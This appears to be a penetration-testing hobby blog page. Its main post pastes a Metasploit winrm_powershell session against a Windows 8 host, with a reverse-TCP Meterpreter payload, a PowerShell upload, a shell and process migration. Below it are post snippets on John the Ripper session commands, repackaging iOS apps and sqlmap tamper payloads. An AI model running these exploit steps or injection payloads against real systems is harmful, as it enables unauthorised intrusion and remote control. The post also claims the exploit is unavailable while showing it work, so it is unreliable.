Skip to main content

Windows 8 Vulnerability

Window 8 "winrm_powershell" vulnerability 

I really can't wait for this new vulnerability for windows 8 possibly a critical issue for the Microsoft to fix this. Currently Metasploit exploit are still not available yet for me to test it. Hopefully it will arrive soon for me to test it!

  1. msf  exploit(winrm_powershell) > show options
  3. Module options (exploit/windows/winrm/winrm_powershell):
  5.    Name      Current Setting  Required  Description
  6.    ----      ---------------  --------  -----------
  7.    DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
  8.    PASSWORD  omfg             no        A specific password to authenticate with
  9.    Proxies                    no        Use a proxy chain
  10.    RHOST     10.6.255.158     yes       The target address
  11.    RPORT     5985             yes       The target port
  12.    URI       /wsman           yes       The URI of the WinRM service
  13.    USERNAME  sinn3r           no        A specific username to authenticate as
  14.    VHOST                      no        HTTP server virtual host
  17. Payload options (windows/meterpreter/reverse_tcp):
  19.    Name      Current Setting  Required  Description
  20.    ----      ---------------  --------  -----------
  21.    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  22.    LHOST     10.6.255.84      yes       The listen address
  23.    LPORT     4444             yes       The listen port
  26. Exploit target:
  28.    Id  Name
  29.    --  ----
  30.    0   Automatic
  33. msf  exploit(winrm_powershell) > rexploit
  34. [*] Reloading module...
  36. [*] Started reverse handler on 10.6.255.84:4444
  37. [*] Attempting to set Execution Policy
  38. [*] Grabbing %TEMP%
  39. [*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
  40. [*] Attempting to execute script...
  41. [*] Sending stage (752128 bytes) to 10.6.255.158
  42. [*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
  44. meterpreter >
  45. [*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
  46. [*] Current server process: powershell.exe (2844)
  47. [+] Migrating to 696
  48. [+] Successfully migrated to process
  50. meterpreter > sysinfo
  51. Computer        : WIN-VFQHRRTCA39
  52. OS              : Windows 8 (Build 9200).
  53. Architecture    : x86
  54. System Language : en_US
  55. Meterpreter     : x86/win32
  56. meterpreter >

Comments

Post a Comment

Popular posts from this blog

Create a session & restore abort/interrupted session in John The Ripper!

Been busy with report writing. Just wanna put some of these command and technique on how to restore interrupted session or aborted session in John The Ripper. 1. First step crack the hash with these commands : john --session=test --format=raw-sha --incremental=rockyou test.txt 2. To restore the abort /interrupted session that you wanted to resume just run these commands : john --restore=test Check the "test.log" Note:  Make sure that these file are not delete " .rec " and " .log " files if the file is deleted or missing it wont work. That's all happy cracking!
Post a Comment
Read more

iOS - Convert .app to .ipa

While doing a iOS Security Testing, I wondered how do we convert .app into .ipa. So basically here are the structure of .ipa files. 1. First, SSH in your iPhone (Jailbroken). 2. Download the .app folder via scp  3. Copy the .app folder into a folder called Payload. 4. Compress it with .zip extension using any compression software. 5. Change the extension from file.zip to file.ipa. That’s it. Now you can use these .ipa files to install the app into your iPhone.
Post a Comment
Read more

List of SQLMAP Tamper Scripts

Just re-post one of my visited reference blog post: Original URL: http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html Name Description Example apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271' appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1' base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw==' between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1' chardoubleencode.py Double url-encodes all character
2 comments
Read more